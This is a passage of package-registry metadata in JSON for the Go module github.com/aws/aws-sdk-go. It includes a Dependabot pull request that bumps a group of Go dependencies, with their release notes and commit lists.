1.34.0"}],"ecosystem":"go","package_name":"github.com/aws/aws-sdk-go"}],"created_at":"2022-12-21T16:13:00.851Z","updated_at":"2024-05-20T21:14:51.000Z","epss_percentage":0.00044,"epss_percentile":0.14502}],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/aws/aws-sdk-go","docker_dependents_count":8616,"docker_downloads_count":42772708412,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/aws/aws-sdk-go","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/aws/aws-sdk-go/dependencies","status":null,"funding_links":[],"critical":true,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Faws%2Faws-sdk-go/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Faws%2Faws-sdk-go/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Faws%2Faws-sdk-go/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Faws%2Faws-sdk-go/related_packages","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":1880632,"maintainers_count":0,"namespaces_count":723642,"keywords_count":97475,"github":"golang","metadata":{"funded_packages_count":39074},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2025-06-04T05:25:56.800Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},"unique_repositories_count":515,"unique_repositories_count_past_30_days":5,"recent_issues":[{"uuid":"4474917987","node_id":"PR_kwDOOYn_TM7c8SIj","number":80,"state":"closed","title":"chore(deps): bump the go-deps group across 1 directory with 47 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-20T03:53:49.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-19T06:20:39.000Z","updated_at":"2026-05-20T03:53:51.000Z","time_to_close":77590,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"go-deps","update_count":47,"packages":[{"name":"cloud.google.com/go/bigquery","old_version":"1.67.0","new_version":"1.77.0","repository_url":"https://github.com/googleapis/google-cloud-go"},{"name":"github.com/allisson/go-pglock/v3","old_version":"3.0.0","new_version":"3.2.0","repository_url":"https://github.com/allisson/go-pglock"},{"name":"github.com/apache/pulsar-client-go","old_version":"0.14.0","new_version":"0.19.0","repository_url":"https://github.com/apache/pulsar-client-go"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.6","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/bufbuild/httplb","old_version":"0.3.1","new_version":"0.4.1","repository_url":"https://github.com/bufbuild/httplb"},{"name":"github.com/confluentinc/confluent-kafka-go/v2","old_version":"2.8.0","new_version":"2.14.1","repository_url":"https://github.com/confluentinc/confluent-kafka-go"},{"name":"github.com/databricks/databricks-sql-go","old_version":"1.7.0","new_version":"1.11.0","repository_url":"https://github.com/databricks/databricks-sql-go"},{"name":"github.com/dgraph-io/badger/v4","old_version":"4.7.0","new_version":"4.9.1","repository_url":"https://github.com/dgraph-io/badger"},{"name":"github.com/dlclark/regexp2","old_version":"1.11.5","new_version":"1.12.0","repository_url":"https://github.com/dlclark/regexp2"},{"name":"github.com/docker/docker","old_version":"28.0.4+incompatible","new_version":"28.5.2+incompatible","repository_url":"https://github.com/docker/docker"},{"name":"github.com/go-chi/chi/v5","old_version":"5.2.1","new_version":"5.2.5","repository_url":"https://github.com/go-chi/chi"},{"name":"github.com/golang-migrate/migrate/v4","old_version":"4.18.2","new_version":"4.19.1","repository_url":"https://github.com/golang-migrate/migrate"},{"name":"github.com/gomodule/redigo","old_version":"1.9.2","new_version":"1.9.3","repository_url":"https://github.com/gomodule/redigo"},{"name":"github.com/hashicorp/go-retryablehttp","old_version":"0.7.7","new_version":"0.7.8","repository_url":"https://github.com/hashicorp/go-retryablehttp"},{"name":"github.com/k3a/html2text","old_version":"1.2.1","new_version":"1.4.0","repository_url":"https://github.com/k3a/html2text"},{"name":"github.com/lib/pq","old_version":"1.10.9","new_version":"1.12.3","repository_url":"https://github.com/lib/pq"},{"name":"github.com/linkedin/goavro/v2","old_version":"2.13.1","new_version":"2.15.0","repository_url":"https://github.com/linkedin/goavro"},{"name":"github.com/minio/minio-go/v7","old_version":"7.0.90","new_version":"7.1.0","repository_url":"https://github.com/minio/minio-go"},{"name":"github.com/onsi/ginkgo/v2","old_version":"2.23.4","new_version":"2.29.0","repository_url":"https://github.com/onsi/ginkgo"},{"name":"github.com/redis/go-redis/v9","old_version":"9.7.3","new_version":"9.19.0","repository_url":"https://github.com/redis/go-redis"},{"name":"github.com/rudderlabs/rudder-go-kit","old_version":"0.48.2","new_version":"0.76.0","repository_url":"https://github.com/rudderlabs/rudder-go-kit"},{"name":"github.com/rudderlabs/sqlconnect-go","old_version":"1.20.0","new_version":"1.25.2","repository_url":"https://github.com/rudderlabs/sqlconnect-go"},{"name":"github.com/tidwall/gjson","old_version":"1.18.0","new_version":"1.19.0","repository_url":"https://github.com/tidwall/gjson"},{"name":"github.com/trinodb/trino-go-client","old_version":"0.323.0","new_version":"0.333.0","repository_url":"https://github.com/trinodb/trino-go-client"},{"name":"github.com/urfave/cli/v2","old_version":"2.27.6","new_version":"2.27.7","repository_url":"https://github.com/urfave/cli"}],"path":null,"ecosystem":"go"},"body":"Bumps the go-deps group with 25 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [cloud.google.com/go/bigquery](https://github.com/googleapis/google-cloud-go) | `1.67.0` | `1.77.0` |\n| [github.com/allisson/go-pglock/v3](https://github.com/allisson/go-pglock) | `3.0.0` | `3.2.0` |\n| [github.com/apache/pulsar-client-go](https://github.com/apache/pulsar-client-go) | `0.14.0` | `0.19.0` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.6` | `1.55.8` |\n| [github.com/bufbuild/httplb](https://github.com/bufbuild/httplb) | `0.3.1` | `0.4.1` |\n| [github.com/confluentinc/confluent-kafka-go/v2](https://github.com/confluentinc/confluent-kafka-go) | `2.8.0` | `2.14.1` |\n| [github.com/databricks/databricks-sql-go](https://github.com/databricks/databricks-sql-go) | `1.7.0` | `1.11.0` |\n| [github.com/dgraph-io/badger/v4](https://github.com/dgraph-io/badger) | `4.7.0` | `4.9.1` |\n| [github.com/dlclark/regexp2](https://github.com/dlclark/regexp2) | `1.11.5` | `1.12.0` |\n| [github.com/docker/docker](https://github.com/docker/docker) | `28.0.4+incompatible` | `28.5.2+incompatible` |\n| [github.com/go-chi/chi/v5](https://github.com/go-chi/chi) | `5.2.1` | `5.2.5` |\n| [github.com/golang-migrate/migrate/v4](https://github.com/golang-migrate/migrate) | `4.18.2` | `4.19.1` |\n| [github.com/gomodule/redigo](https://github.com/gomodule/redigo) | `1.9.2` | `1.9.3` |\n| [github.com/hashicorp/go-retryablehttp](https://github.com/hashicorp/go-retryablehttp) | `0.7.7` | `0.7.8` |\n| [github.com/k3a/html2text](https://github.com/k3a/html2text) | `1.2.1` | `1.4.0` |\n| [github.com/lib/pq](https://github.com/lib/pq) | `1.10.9` | `1.12.3` |\n| [github.com/linkedin/goavro/v2](https://github.com/linkedin/goavro) | `2.13.1` | `2.15.0` |\n| [github.com/minio/minio-go/v7](https://github.com/minio/minio-go) | `7.0.90` | `7.1.0` |\n| [github.com/onsi/ginkgo/v2](https://github.com/onsi/ginkgo) | `2.23.4` | `2.29.0` |\n| [github.com/redis/go-redis/v9](https://github.com/redis/go-redis) | `9.7.3` | `9.19.0` |\n| [github.com/rudderlabs/rudder-go-kit](https://github.com/rudderlabs/rudder-go-kit) | `0.48.2` | `0.76.0` |\n| [github.com/rudderlabs/sqlconnect-go](https://github.com/rudderlabs/sqlconnect-go) | `1.20.0` | `1.25.2` |\n| [github.com/tidwall/gjson](https://github.com/tidwall/gjson) | `1.18.0` | `1.19.0` |\n| [github.com/trinodb/trino-go-client](https://github.com/trinodb/trino-go-client) | `0.323.0` | `0.333.0` |\n| [github.com/urfave/cli/v2](https://github.com/urfave/cli) | `2.27.6` | `2.27.7` |\n\n\nUpdates `cloud.google.com/go/bigquery` from 1.67.0 to 1.77.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/7cd251203fc35859882ecda532b7debaff378374\"\u003e\u003ccode\u003e7cd2512\u003c/code\u003e\u003c/a\u003e chore(main): release spanner 1.77.0 (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11634\"\u003e#11634\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/28f00304ebb13abfd0da2f45b9b79de093cca1ec\"\u003e\u003ccode\u003e28f0030\u003c/code\u003e\u003c/a\u003e chore(all): fix out-of-sync version.go files (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11684\"\u003e#11684\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/655de36dce9cfd32ef88cb58037dbf655b93da21\"\u003e\u003ccode\u003e655de36\u003c/code\u003e\u003c/a\u003e feat(spanner): Support REPEATABLE_READ for RW transaction (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11654\"\u003e#11654\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/60dc167a3e9c2876fe55a4f50bd7e0682f953d67\"\u003e\u003ccode\u003e60dc167\u003c/code\u003e\u003c/a\u003e fix(aiplatform): remove VertexAISearch.engine option (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11681\"\u003e#11681\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/3f23a9176f29a0a69b9d57b16f44b72eb3096d0c\"\u003e\u003ccode\u003e3f23a91\u003c/code\u003e\u003c/a\u003e fix(aiplatform): An existing google.api.http annotation \u003ccode\u003ehttp_uri\u003c/code\u003e is changed...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/e87cedc467cbb5205ebe67855e2a95a5edb98bba\"\u003e\u003ccode\u003ee87cedc\u003c/code\u003e\u003c/a\u003e chore: remove resourcesettings (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11678\"\u003e#11678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/d662a4537c3883d13a612e335477ca875b5cf479\"\u003e\u003ccode\u003ed662a45\u003c/code\u003e\u003c/a\u003e feat(spanner): add option for LastStatement in transaction (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11638\"\u003e#11638\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/9e508d066bdaa7e41c251fa0ba7eb9b23587c3a0\"\u003e\u003ccode\u003e9e508d0\u003c/code\u003e\u003c/a\u003e chore: release main (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11623\"\u003e#11623\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/601e74202ca6bf28506f06f27abc1d99018f9dc5\"\u003e\u003ccode\u003e601e742\u003c/code\u003e\u003c/a\u003e feat(bigquery/reservation): Add a new field \u003ccode\u003ereplication_status\u003c/code\u003e to `.google....\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/1eb601ee788e5fbc0a9f55cde580493191782df3\"\u003e\u003ccode\u003e1eb601e\u003c/code\u003e\u003c/a\u003e chore(firestore): expose the Firestore.executePipeline API to the preview bra...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/spanner/v1.67.0...spanner/v1.77.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cloud.google.com/go/pubsub` from 1.49.0 to 1.50.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/43375a0822ef7f64f1ccc43d83c804589a364f5f\"\u003e\u003ccode\u003e43375a0\u003c/code\u003e\u003c/a\u003e chore(main): release pubsub 1.50.1 (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12800\"\u003e#12800\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/9e761f961a2c4351b3e0793ed655314ac5853903\"\u003e\u003ccode\u003e9e761f9\u003c/code\u003e\u003c/a\u003e feat(storage): post support dynamic key name (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12677\"\u003e#12677\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/8650d332d2030a8a14f2839285bb61c464e26563\"\u003e\u003ccode\u003e8650d33\u003c/code\u003e\u003c/a\u003e test(storage): update err codes for append test (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12807\"\u003e#12807\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/81182666589efb09569c58045044b2f6abcc8547\"\u003e\u003ccode\u003e8118266\u003c/code\u003e\u003c/a\u003e chore(main): release 0.122.0 (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12764\"\u003e#12764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/4f1129c655226c61333be2c7ec75151e603c84d1\"\u003e\u003ccode\u003e4f1129c\u003c/code\u003e\u003c/a\u003e chore: upgrade to Go 1.24 (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12781\"\u003e#12781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/6614c1f0881a36ece018f2f03881eb01f546b302\"\u003e\u003ccode\u003e6614c1f\u003c/code\u003e\u003c/a\u003e chore: update all librarian state.yaml files to point to AR exit gates image ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/400bba5dd555b999e7bbea0b7f69719aec8e6f25\"\u003e\u003ccode\u003e400bba5\u003c/code\u003e\u003c/a\u003e chore: release main (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12737\"\u003e#12737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/4e6e92bd5d74e4f0b17c4361af64761cec7a02b7\"\u003e\u003ccode\u003e4e6e92b\u003c/code\u003e\u003c/a\u003e chore: Fix exitgate GCB configuration (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12806\"\u003e#12806\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/10e67efccf048adea11d3ecba8d0c625455e545f\"\u003e\u003ccode\u003e10e67ef\u003c/code\u003e\u003c/a\u003e feat(netapp): add new fields for flex auto tiering (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12798\"\u003e#12798\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/5ac49f661bd4743f912cfd777aff2d35cdde652b\"\u003e\u003ccode\u003e5ac49f6\u003c/code\u003e\u003c/a\u003e chore(spanner): Disable connecting to metadata server for emulator tests (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12\"\u003e#12\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/pubsub/v1.49.0...pubsub/v1.50.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cloud.google.com/go/storage` from 1.51.0 to 1.62.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/googleapis/google-cloud-go/releases\"\u003ecloud.google.com/go/storage's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003estorage: v1.59.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/storage/v1.59.2...storage/v1.59.3\"\u003ev1.59.3\u003c/a\u003e (2026-05-05)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle MRD hang corner case (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14509\"\u003e#14509\u003c/a\u003e) (\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/1ca3b6f0\"\u003e1ca3b6f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003econtainer: v1.52.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/container/v1.51.0...container/v1.52.0\"\u003ev1.52.0\u003c/a\u003e (2026-05-14)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate API sources and regenerate (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14581\"\u003e#14581\u003c/a\u003e) (\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/df96b2ec\"\u003edf96b2ec\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/94d24ca358d9f98ccd48d1b826cfab83557d5b19\"\u003e\u003ccode\u003e94d24ca\u003c/code\u003e\u003c/a\u003e chore: librarian release pull request: 20260507T184113Z (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14549\"\u003e#14549\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/541569e80c1154b8742f147fa9667b6794be84eb\"\u003e\u003ccode\u003e541569e\u003c/code\u003e\u003c/a\u003e docs: update README to reflect Gemini Enterprise Agent Platform\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/237533a0b5847011484577241e8201ccce7e31a0\"\u003e\u003ccode\u003e237533a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14545\"\u003e#14545\u003c/a\u003e from googleapis:release-agentplatform-0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/d70876ae5d1c9de02b34df004fc0ab1c1799c289\"\u003e\u003ccode\u003ed70876a\u003c/code\u003e\u003c/a\u003e chore: release agentplatform@v0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/32a256f9daba9dbf640fd5d0f9a8975b0e35c72d\"\u003e\u003ccode\u003e32a256f\u003c/code\u003e\u003c/a\u003e feat(agentplatform): Add structured data and memory type to Memory.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/37572e3b9f0b504bc65b93c8ac30e7cd81951c6d\"\u003e\u003ccode\u003e37572e3\u003c/code\u003e\u003c/a\u003e chore: update librarian to use new config command (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14540\"\u003e#14540\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/d6d7382a552197980f8f7e19188a98b5816307bc\"\u003e\u003ccode\u003ed6d7382\u003c/code\u003e\u003c/a\u003e chore(agentplatform): update deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/fd34e97401e8089d5af765b7664778a3038906d9\"\u003e\u003ccode\u003efd34e97\u003c/code\u003e\u003c/a\u003e feat(geminidataanlytics): generate v1 client (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14542\"\u003e#14542\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/07fe29ba4c5069d27d4149d8fa5f8814eb8789d7\"\u003e\u003ccode\u003e07fe29b\u003c/code\u003e\u003c/a\u003e feat: update API sources and regenerate (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14537\"\u003e#14537\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/6b9f6c7b0930a94abd717d5097fd0b8868171aa2\"\u003e\u003ccode\u003e6b9f6c7\u003c/code\u003e\u003c/a\u003e feat(memorystore): enable gRPC transport (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14532\"\u003e#14532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/compute/v1.51.0...compute/v1.62.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/allisson/go-pglock/v3` from 3.0.0 to 3.2.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/allisson/go-pglock/releases\"\u003egithub.com/allisson/go-pglock/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.2.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat: add rwlock functionality by \u003ca href=\"https://github.com/masteryyh\"\u003e\u003ccode\u003e@​masteryyh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/allisson/go-pglock/pull/15\"\u003eallisson/go-pglock#15\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: enhance documentation with emojis by \u003ca href=\"https://github.com/allisson\"\u003e\u003ccode\u003e@​allisson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/allisson/go-pglock/pull/16\"\u003eallisson/go-pglock#16\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/masteryyh\"\u003e\u003ccode\u003e@​masteryyh\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/allisson/go-pglock/pull/15\"\u003eallisson/go-pglock#15\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/allisson/go-pglock/compare/v3.1.0...v3.2.0\"\u003ehttps://github.com/allisson/go-pglock/compare/v3.1.0...v3.2.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate readme badges by \u003ca href=\"https://github.com/allisson\"\u003e\u003ccode\u003e@​allisson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/allisson/go-pglock/pull/12\"\u003eallisson/go-pglock#12\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: improve documentation, tests, and examples by \u003ca href=\"https://github.com/allisson\"\u003e\u003ccode\u003e@​allisson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/allisson/go-pglock/pull/13\"\u003eallisson/go-pglock#13\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/allisson/go-pglock/compare/v3.0.0...v3.1.0\"\u003ehttps://github.com/allisson/go-pglock/compare/v3.0.0...v3.1.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/allisson/go-pglock/commit/a8e599f5ce4b824fae73d5a1aec1d7e2b1a3671a\"\u003e\u003ccode\u003ea8e599f\u003c/code\u003e\u003c/a\u003e docs: enhance documentation with emojis (\u003ca href=\"https://redirect.github.com/allisson/go-pglock/issues/16\"\u003e#16\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/allisson/go-pglock/commit/e3b767aa28a0f8a2a7eacb0360ed3dc6b3f0ed88\"\u003e\u003ccode\u003ee3b767a\u003c/code\u003e\u003c/a\u003e feat: add rwlock functionality (\u003ca href=\"https://redirect.github.com/allisson/go-pglock/issues/15\"\u003e#15\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/allisson/go-pglock/commit/e2016c003ade7d3b44ece6ab9e867f9fcc02fa32\"\u003e\u003ccode\u003ee2016c0\u003c/code\u003e\u003c/a\u003e feat: improve documentation, tests, and examples (\u003ca href=\"https://redirect.github.com/allisson/go-pglock/issues/13\"\u003e#13\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/allisson/go-pglock/commit/acbfc79e2be6166be54a64f2a0fb8babee1d0334\"\u003e\u003ccode\u003eacbfc79\u003c/code\u003e\u003c/a\u003e Update readme badges (\u003ca href=\"https://redirect.github.com/allisson/go-pglock/issues/12\"\u003e#12\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/allisson/go-pglock/compare/v3.0.0...v3.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/apache/pulsar-client-go` from 0.14.0 to 0.19.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/pulsar-client-go/releases\"\u003egithub.com/apache/pulsar-client-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.19.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Add JSON tag for \u003ccode\u003eUpdateAuthData\u003c/code\u003e in \u003ccode\u003eUpdateOptions\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1450\"\u003e#1450\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add \u003ccode\u003eRemovePersistence\u003c/code\u003e methods to namespace admin (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1447\"\u003e#1447\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Add support for PIP-431: creation and last publish timestamps (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1451\"\u003e#1451\u003c/a\u003e) by \u003ca href=\"https://github.com/codelipenghui\"\u003e\u003ccode\u003e@​codelipenghui\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[docs] Update example code and add log initialization configurations (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1449\"\u003e#1449\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[docs] Update release process to link release and release notes to the Pulsar website (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1453\"\u003e#1453\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Change producer reconnect error logs to warn logs (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1445\"\u003e#1445\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Implement 